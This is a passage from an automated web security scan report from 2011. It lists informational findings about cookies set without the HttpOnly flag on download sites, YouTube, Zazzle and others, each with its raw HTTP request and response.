Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%229%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90164


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.922. http://www.x64bitdownload.com/categories/free-64-bit-multimedia-design-downloads-258-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-multimedia-design-downloads-258-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A3%3A%22258%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /categories/free-64-bit-multimedia-design-downloads-258-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:17 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:42:36 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A3%3A%22258%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29669


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.923. http://www.x64bitdownload.com/categories/free-64-bit-network-internet-downloads-10-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-network-internet-downloads-10-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2210%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /categories/free-64-bit-network-internet-downloads-10-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:29:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:39:28 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2210%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79744


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.924. http://www.x64bitdownload.com/categories/free-64-bit-security-privacy-downloads-11-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-security-privacy-downloads-11-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2211%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /categories/free-64-bit-security-privacy-downloads-11-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:30:00 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:40:16 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2211%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86135


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.925. http://www.x64bitdownload.com/categories/free-64-bit-servers-downloads-12-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-servers-downloads-12-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2212%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /categories/free-64-bit-servers-downloads-12-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:30:34 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:40:46 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2212%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79861


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.926. http://www.x64bitdownload.com/categories/free-64-bit-system-utilities-downloads-13-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-system-utilities-downloads-13-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2213%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /categories/free-64-bit-system-utilities-downloads-13-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:31:12 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:41:19 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2213%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83609


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.927. http://www.x64bitdownload.com/categories/free-64-bit-web-development-downloads-14-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-web-development-downloads-14-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2214%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /categories/free-64-bit-web-development-downloads-14-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:04 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:42:07 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2214%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89951


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.928. http://www.x64bitdownload.com/categories/free-64-bit-widgets-downloads-304-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-widgets-downloads-304-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A3%3A%22304%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /categories/free-64-bit-widgets-downloads-304-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:06 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:42:24 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A3%3A%22304%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 73700


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.929. http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-ozum-download-lhtivuds.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • downloadsite=2k9hcu88qhiq0oc88olgcs7f73; expires=Sat, 23 Jul 2011 14:54:37 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /downloads/t-64-bit-ozum-download-lhtivuds.html HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:54:37 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73; expires=Sat, 23 Jul 2011 14:54:37 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57051


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.930. http://www.x64bitdownload.com/drivers/64-bit-vista-drivers.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /drivers/64-bit-vista-drivers.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22vista%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22vista%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /drivers/64-bit-vista-drivers.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:23:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22vista%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22vista%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63574


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.931. http://www.yencode.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yencode.org
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • h=0f3405bcfd70171c7c84f1086ca726c7; path=/
  • R=c%253EfXWvZ3%253Al%255BT6wdnd%253E%2527tfbsdi%2560uzqf%253Etfbsdi%2527f%253Evt%253CVT%253C5%253C2%253C2%253C56911935%253Ctuzmf2%25605%252Fdtt%253C3%253Cjoufsdptnpt%2560bggjmjbuf%25603%2560e3s%2560efsq%253Ceoqbslfehppe%253Ceoqbslfehppe%253C6174896%253C282%253Cdmfbo%253C%253C0e0tfbsdi0q0tuboebse0ynm0epnbjomboefs0joum0e3s0gmfy0w30%253Cenynm%252Fjoufsdptnpt%252Fpwfsuvsf%252Fdpn%2527jqvb%2560je%253E1g4516cdge81282d8d95g2197db837d8%2527enybsht%253E17pFOzb5%255BH2ZT7wPMKxqMjGekH%253A2JDschPTuQxP5fI1%2560Hf5eu%255BB.qDvh3k%255BJYwBby84RwLgccHR%2560rGtC%253AcDNoHl%253AQoLgoufM2K%2560XF7XBHFU8mQm89qdjeZxRKigOcb6IlBJuM3btd1Q24.Ch2Yknb6Mme1Zy.PVd3TJH3IIeekgGumCCVZwz%2560%255BGLuIck.2-ZU1%257BP3t%253AOR%252F%252F; expires=Mon, 24-Jan-2011 15:45:08 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.yencode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:08 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.11
Set-Cookie: h=0f3405bcfd70171c7c84f1086ca726c7; path=/
Set-Cookie: R=c%253EfXWvZ3%253Al%255BT6wdnd%253E%2527tfbsdi%2560uzqf%253Etfbsdi%2527f%253Evt%253CVT%253C5%253C2%253C2%253C56911935%253Ctuzmf2%25605%252Fdtt%253C3%253Cjoufsdptnpt%2560bggjmjbuf%25603%2560e3s%2560efsq%253Ceoqbslfehppe%253Ceoqbslfehppe%253C6174896%253C282%253Cdmfbo%253C%253C0e0tfbsdi0q0tuboebse0ynm0epnbjomboefs0joum0e3s0gmfy0w30%253Cenynm%252Fjoufsdptnpt%252Fpwfsuvsf%252Fdpn%2527jqvb%2560je%253E1g4516cdge81282d8d95g2197db837d8%2527enybsht%253E17pFOzb5%255BH2ZT7wPMKxqMjGekH%253A2JDschPTuQxP5fI1%2560Hf5eu%255BB.qDvh3k%255BJYwBby84RwLgccHR%2560rGtC%253AcDNoHl%253AQoLgoufM2K%2560XF7XBHFU8mQm89qdjeZxRKigOcb6IlBJuM3btd1Q24.Ch2Yknb6Mme1Zy.PVd3TJH3IIeekgGumCCVZwz%2560%255BGLuIck.2-ZU1%257BP3t%253AOR%252F%252F; expires=Mon, 24-Jan-2011 15:45:08 GMT; path=/
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 31 Dec 2001 7:32:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

14.932. http://www.yootheme.com/license

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yootheme.com
Path:   /license

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 0a037d8aa01b5240628765e3d35f3802=fcc157f1a62351510d502dbf94d54b0d; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /license HTTP/1.1
Host: www.yootheme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:40:26 GMT
Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 0a037d8aa01b5240628765e3d35f3802=fcc157f1a62351510d502dbf94d54b0d; path=/
Last-Modified: Tue, 25 Jan 2011 04:40:26 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14130

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...

14.933. http://www.youtube.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • PREF=f1=50000000; path=/; domain=.youtube.com; expires=Thu, 21-Jan-2021 16:01:43 GMT
  • GEO=930f412dd946c393c719c45b1db7c824cwsAAAAzVVOtwdbzTT2iZw==; path=/; domain=.youtube.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?hl=en&tab=w1 HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE; use_hitbox=3d11d5cb2b3e40e368f83f82e88170a4dAEAAAAx; GEO=5b80f4299f7903fea6e2637fc3585e04cwsAAAAzVVOtwdbzTTzh/A==;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:43 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: PREF=f1=50000000; path=/; domain=.youtube.com; expires=Thu, 21-Jan-2021 16:01:43 GMT
Set-Cookie: GEO=930f412dd946c393c719c45b1db7c824cwsAAAAzVVOtwdbzTT2iZw==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >
<!-- machid: nUXNCUHlydnptdzgzNGFVaGlHd19GbmxTRkhJb2V0VTJfeFNPTEN0RmJYSHZKeURvdW5oZi1R -->
<head>
<script>
var yt = yt || {};

yt.timing
...[SNIP]...

14.934. http://www.youtube.com/results

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /results

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PREF=f1=50000000; path=/; domain=.youtube.com; expires=Thu, 21-Jan-2021 16:01:47 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /results?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=w1 HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE; use_hitbox=3d11d5cb2b3e40e368f83f82e88170a4dAEAAAAx; GEO=5b80f4299f7903fea6e2637fc3585e04cwsAAAAzVVOtwdbzTTzh/A==;

Response

HTTP/1.1 303 See Other
Date: Mon, 24 Jan 2011 16:01:47 GMT
Server: wiseguy/0.6.7
Content-Length: 0
X-Content-Type-Options: nosniff
Set-Cookie: PREF=f1=50000000; path=/; domain=.youtube.com; expires=Thu, 21-Jan-2021 16:01:47 GMT
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Location: http://www.youtube.com/das_captcha?next=http%3A//www.youtube.com/results%3Fhl%3Den%26q%3Dges%26um%3D1%26ie%3DUTF-8%26sa%3DN%26tab%3Dw1
Connection: close


14.935. http://www.youtube.com/subscribe_widget

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /subscribe_widget

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
  • GEO=0341a4aa07c201d99d06557f57bd4ecbcwsAAAAzVVOtwdbzTTzh+w==; path=/; domain=.youtube.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /subscribe_widget?p=joomla HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
Referer: http://community.joomla.org/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:20:43 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: GEO=0341a4aa07c201d99d06557f57bd4ecbcwsAAAAzVVOtwdbzTTzh+w==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 2953

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Subscribe to joomla</title>
<link rel="stylesheet" href="http://s.ytimg.c
...[SNIP]...

14.936. http://www.zazzle.com/netlingo

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zazzle.com
Path:   /netlingo

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • rfm=rf%3d238222574511555904%26rfd%3d348679991; path=/;
  • qsp=nu%3d%2fnetlingo%3frf%3d238222574511555904; path=/;
  • zm=AQABAAAA8wcAABRS51j4EtDi9_oXt9FxROJyObhwRurz-b1BlGyLguagTvY6WTBoBb1sgEeFFIX6rKczW8ChxGhUVBWXLHNva6BIym6yAoY-4StNvvJUN6oKQP5Gr9F6snKOWkSXH-nGNXDxyJQV; domain=.zazzle.com; path=/
  • zs=6502D26E-A4F0-4420-AEC5-26B4B55758F8%7c0%7c12940404058%7c; domain=.zazzle.com; expires=Tue, 01-Jan-2036 08:00:00 GMT; path=/
  • us=FA9F74DB-FD90-49BE-A241-2728DB49B0ED; domain=.zazzle.com; expires=Tue, 01-Jan-2036 08:00:00 GMT; path=/
  • s=5246001291012673539; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /netlingo?rf=238222574511555904 HTTP/1.1
Host: www.zazzle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 0
Expires: -1
Location: /netlingo
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: rfm=rf%3d238222574511555904%26rfd%3d348679991; path=/;
Set-Cookie: qsp=nu%3d%2fnetlingo%3frf%3d238222574511555904; path=/;
Set-Cookie: zm=AQABAAAA8wcAABRS51j4EtDi9_oXt9FxROJyObhwRurz-b1BlGyLguagTvY6WTBoBb1sgEeFFIX6rKczW8ChxGhUVBWXLHNva6BIym6yAoY-4StNvvJUN6oKQP5Gr9F6snKOWkSXH-nGNXDxyJQV; domain=.zazzle.com; path=/
Set-Cookie: zs=6502D26E-A4F0-4420-AEC5-26B4B55758F8%7c0%7c12940404058%7c; domain=.zazzle.com; expires=Tue, 01-Jan-2036 08:00:00 GMT; path=/
Set-Cookie: us=FA9F74DB-FD90-49BE-A241-2728DB49B0ED; domain=.zazzle.com; expires=Tue, 01-Jan-2036 08:00:00 GMT; path=/
Set-Cookie: general%5Fmaturity=1; domain=.zazzle.com; path=/
Set-Cookie: s=5246001291012673539; path=/
Date: Tue, 25 Jan 2011 04:40:58 GMT


14.937. http://www.zazzle.com/netlingo

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zazzle.com
Path:   /netlingo

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • zshopurl=z%2fnetlingo; path=/
